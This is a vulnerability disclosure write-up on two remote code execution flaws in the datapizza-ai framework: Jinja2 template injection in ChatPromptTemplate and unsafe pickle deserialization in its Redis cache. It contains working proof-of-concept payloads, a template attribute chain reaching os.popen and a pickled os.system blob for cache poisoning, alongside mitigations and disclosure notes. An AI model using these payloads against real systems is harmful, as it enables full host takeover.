Two Remote Code Execution (RCE) vulnerabilities were identified in the datapizza-ai framework:
Template() allows Server-Side Template Injection (SSTI). If an attacker can control prompt templates, they can execute arbitrary system commands on the host.
pickle.loads() on untrusted data. By poisoning the cache, an attacker can trigger arbitrary command execution when cached objects are deserialized.
Source here: https://github.com/datapizza-labs/datapizza-ai.
The vulnerability is caused by passing prompt template strings straight to the unsandboxed Template class of the Jinja2 template engine (datapizza-ai-core/datapizza/modules/prompt/prompt.py, source here https://github.com/datapizza-labs/datapizza-ai/blob/v0.0.2/datapizza-ai-core/datapizza/modules/prompt/prompt.py).
from jinja2 import Template
# ...
class ChatPromptTemplate(Prompt):
    # ...
    def __init__(self, user_prompt_template, retrieval_prompt_template):
        self.user_prompt_template = Template(user_prompt_template)
        self.retrieval_prompt_template = Template(retrieval_prompt_template)
    # ...
        # Add user's prompt
        formatted_user_prompt = self.user_prompt_template.render(
            user_prompt=user_prompt
        )
        # ...
        formatted_retrieval = self.retrieval_prompt_template.render(chunks=chunks)
        # ...
To reproduce the exploit we have to install datapizza-ai:
python -m venv .venv
source .venv/bin/activate
pip install datapizza-ai==0.0.2
Create a Python file named poc.py with the following content:
import uuid
from datapizza.modules.prompt import ChatPromptTemplate
from datapizza.type import Chunk

# Create structured prompts for different tasks
system_prompt = ChatPromptTemplate(
    user_prompt_template="You are helping with data analysis tasks, this is the user prompt: " \
        "{{self.__init__.__globals__.__builtins__.__import__('os').popen('touch pwned1')}}",
    retrieval_prompt_template="Retrieved " \
        "{{self.__init__.__globals__.__builtins__.__import__('os').popen('touch pwned2')}} " \
        "content:\n{% for chunk in chunks %}{{ chunk.text }}\n{% endfor %}"
)
print(
    system_prompt.format(
        user_prompt="Hello, how are you?",
        chunks=[
            Chunk(id=str(uuid.uuid4()), text="This is a chunk"),
            Chunk(id=str(uuid.uuid4()), text="This is another chunk")
        ]
    )
)
Execute the file with python3 poc.py.
Command injection result (ls -alh):
total 28K
drwxrwxr-x 3 edoardottt edoardottt 4.0K Oct 14 12:31 .
drwxrwxr-x 13 edoardottt edoardottt 4.0K Oct 14 11:51 ..
-rw-rw-r-- 1 edoardottt edoardottt 808 Oct 14 12:31 poc3-working.py
-rw-rw-r-- 1 edoardottt edoardottt 0 Oct 14 12:30 pwned1
-rw-rw-r-- 1 edoardottt edoardottt 0 Oct 14 12:30 pwned2
drwxrwxr-x 5 edoardottt edoardottt 4.0K Oct 14 11:53 .venv
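To see why the payload works, here is a minimal sketch of the same attribute walk in plain Python, with no Jinja2 involved. The Demo class and the reach_import helper are made up for illustration. The only assumption is that the starting object has an __init__ written in Python, which, as far as I can tell, holds for the self object that Jinja2 exposes inside a template. The sketch stops at a harmless getcwd() call instead of popen().

```python
class Demo:
    """Hypothetical stand-in for any object whose __init__ is a Python function."""

    def __init__(self):
        pass


def reach_import(obj):
    """Walk from an ordinary object to the built-in __import__ function."""
    # A bound method forwards attribute access to its underlying function,
    # and every Python function exposes the globals of its defining module.
    module_globals = obj.__init__.__globals__
    builtins_ns = module_globals["__builtins__"]
    # __builtins__ is a module in __main__ and a plain dict in other modules.
    if isinstance(builtins_ns, dict):
        return builtins_ns["__import__"]
    return builtins_ns.__import__


importer = reach_import(Demo())
os_module = importer("os")
# The PoC calls popen() here; getcwd() is used as a harmless replacement.
print(os_module.getcwd())
```

Inside a template, Jinja2 performs these lookups on the attacker's behalf: it resolves a dotted name with an attribute lookup and falls back to an item lookup, so the chain works whether __builtins__ is a module or a dict.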
Usually, if attackers can control the prompt templates, they can subvert the model behavior.
In this case, attackers can run arbitrary system commands without any restriction (e.g. they could open a reverse shell and gain access to the server).
The impact is critical, as the attacker can completely take over the server host.
Only a simple Proof of Concept is shown here, but in reality every feature that passes untrusted input to ChatPromptTemplate as a template is vulnerable.
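One way to remove this whole class of bug is to render untrusted templates with a logic-less engine. The sketch below uses string.Template from the standard library as an example. It is not the vendor's fix and not part of datapizza-ai; the function names and the $user_prompt placeholder syntax are assumptions made for illustration. The loop over chunks moves out of the template and into Python.

```python
from string import Template


def format_user_prompt(template_text: str, user_prompt: str) -> str:
    # string.Template only substitutes $name placeholders. It has no
    # expression syntax, so attribute chains in the template stay literal text.
    return Template(template_text).safe_substitute(user_prompt=user_prompt)


def format_retrieval(header: str, chunk_texts: list[str]) -> str:
    # Iterate over the chunks in Python instead of inside the template.
    return header + "\n" + "\n".join(chunk_texts)


malicious = (
    "User prompt: $user_prompt "
    "{{self.__init__.__globals__.__builtins__.__import__('os').popen('touch pwned1')}}"
)
rendered = format_user_prompt(malicious, "Hello, how are you?")
print(rendered)
print(format_retrieval("Retrieved content:", ["This is a chunk", "This is another chunk"]))
```

The payload comes out as inert text and no command runs. The trade-off is that template authors lose loops and conditionals, which may or may not be acceptable for a given application.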
The vulnerability is caused by calling pickle.loads() from the pickle serialization library on values read back from Redis (datapizza-ai-cache/redis/datapizza/cache/redis/cache.py, source here https://github.com/datapizza-labs/datapizza-ai/blob/v0.0.7/datapizza-ai-cache/redis/datapizza/cache/redis/cache.py).
import pickle
# ...
class RedisCache(Cache):
    # ...
    def get(self, key: str) -> str | None:
        """Retrieve and deserialize object"""
        pickled_obj = self.redis.get(key)
        if pickled_obj is None:
            return None
        return pickle.loads(pickled_obj)  # type: ignore

    def set(self, key: str, obj):
        """Serialize and store object"""
        pickled_obj = pickle.dumps(obj)
        self.redis.set(key, pickled_obj, ex=self.expiration_time)
To reproduce the exploit we have to install datapizza-ai and the Redis cache module:
python -m venv .venv
source .venv/bin/activate
pip install datapizza-ai==0.0.7
pip install datapizza-ai-cache-redis
Spin up a Redis server (we’re using Docker for simplicity):
docker run -d --name redis -p 6379:6379 redis:latest
For a simple proof of concept we’re using the bytes representation of the pickled object below:
import os

class Evil:
    def __reduce__(self):
        # pickle calls os.system("touch cachepwned") when this object is loaded
        return (os.system, ("touch cachepwned",))
that is: \x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94..
Poison the Redis cache with this value:
127.0.0.1:6379> set poc "\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94."
OK
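If you want to check what this blob does without running it, the standard library's pickletools module can walk the opcodes without executing anything. This is a small sketch; the summarize helper is a name made up for illustration.

```python
import pickletools

# The PoC payload from above, copied byte for byte.
POC = (
    b"\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94"
    b"\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94."
)


def summarize(data: bytes):
    """List opcode names and string arguments without unpickling."""
    opcodes, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        opcodes.append(opcode.name)
        if isinstance(arg, str):
            strings.append(arg)
    return opcodes, strings


opcodes, strings = summarize(POC)
print(strings)  # ['posix', 'system', 'touch cachepwned']
print("STACK_GLOBAL" in opcodes, "REDUCE" in opcodes)  # True True
```

STACK_GLOBAL looks up posix.system and REDUCE calls it with the argument tuple. That is everything pickle.loads() needs to run the command.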
Then run the Python program below with python3 poc.py.
The following snippet just creates a new Redis cache object and tries to get the value of the key “poc” from Redis.
from datapizza.cache.redis import RedisCache

def test_redis_cache():
    cache = RedisCache(host="localhost", port=6379, db=0)
    cache.get("poc")

test_redis_cache()
Command injection result (ls -alh):
total 16K
-rw-rw-r-- 1 edoardottt edoardottt 0 Oct 15 18:57 cachepwned
-rw-rw-r-- 1 edoardottt edoardottt 312 Oct 15 18:51 poc-cache.py
drwxrwxr-x 5 edoardottt edoardottt 4.0K Oct 14 11:53 .venv/
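Why does a plain get() end up running a command? Because unpickling an object that defines __reduce__ means calling whatever callable it names. The sketch below shows the mechanism with a harmless built-in, len, in place of os.system; the Marker class is made up for illustration.

```python
import pickle


class Marker:
    """Harmless stand-in for the Evil class from the PoC."""

    def __reduce__(self):
        # pickle stores "call len('abc')" instead of the object's state.
        return (len, ("abc",))


blob = pickle.dumps(Marker())
result = pickle.loads(blob)
# loads() does not return a Marker: it returns whatever the callable returned.
print(result)  # 3
```

Swap len for os.system and the argument for a shell command, and you get the PoC payload.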
Usually, if attackers can control the Redis cache, they can subvert the model behavior, for example by injecting fake LLM replies into cached queries.
In this case, attackers can run arbitrary system commands without any restriction (e.g. they could open a reverse shell and gain access to the server).
The impact is high, as the attacker can completely take over the server host.
Only a simple Proof of Concept is shown here, but in reality every feature that uses RedisCache is potentially vulnerable.
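A possible hardening, sketched here under the assumption that the cache only needs to store plain data (strings, numbers, lists, dicts), is the "restricting globals" pattern from the Python pickle documentation: subclass pickle.Unpickler and refuse every global lookup. This is not the vendor's code; RestrictedUnpickler and restricted_loads are illustrative names. Switching to a data-only format such as JSON would be another option.

```python
import io
import pickle

# The PoC payload from above, copied byte for byte.
POC = (
    b"\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94"
    b"\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94."
)


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle tries to load. Refusing all of
        # them still allows built-in containers, strings and numbers.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads() that rejects callables."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Plain data still round-trips.
safe = restricted_loads(pickle.dumps({"answer": "cached reply"}))
print(safe)

# The poisoned value is rejected before os.system is ever looked up.
try:
    restricted_loads(POC)
    blocked = False
except pickle.UnpicklingError as exc:
    blocked = True
    print("rejected:", exc)
```

If the cache has to store instances of custom classes, find_class would need an explicit allowlist instead of a blanket refusal.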
I want to share a couple of thoughts:
First: how is it possible that in 2026 we still have these types of vulnerabilities?
Nowadays, any developer should know that every language has libraries, such as Jinja2 and pickle, that can lead to severe vulnerabilities when fed untrusted input.
Second: It was a pain in the ass communicating with the vendor.
We used emails (from me and a CNA), Discord messages and GitHub private security advisories, and still this is all that has happened so far:
The SSTI was fixed in datapizza-ai-core v0.0.3 (https://github.com/datapizza-labs/datapizza-ai/commit/31cb15234dd05e5d2f3d4a3499b050602fb1304a) without public advisory or user notification.
That’s it, no further communication. We didn’t receive replies to our messages, and no public advisory or user notification was issued in accordance with responsible disclosure practices.
The Unsafe Deserialization is still present, with no response from the vendor (https://github.com/datapizza-labs/datapizza-ai/blob/f3c5508acce857f6a454ca239aea7481f97ceb69/datapizza-ai-cache/redis/datapizza/cache/redis/cache.py).
How is it possible that in 2026 companies still fail to understand how basic security practices work and don’t care about the security of their products (and users)?
At first I wanted to use a lot of memes here (Datapizza uses a lot of them), but honestly there’s nothing to laugh about 😕.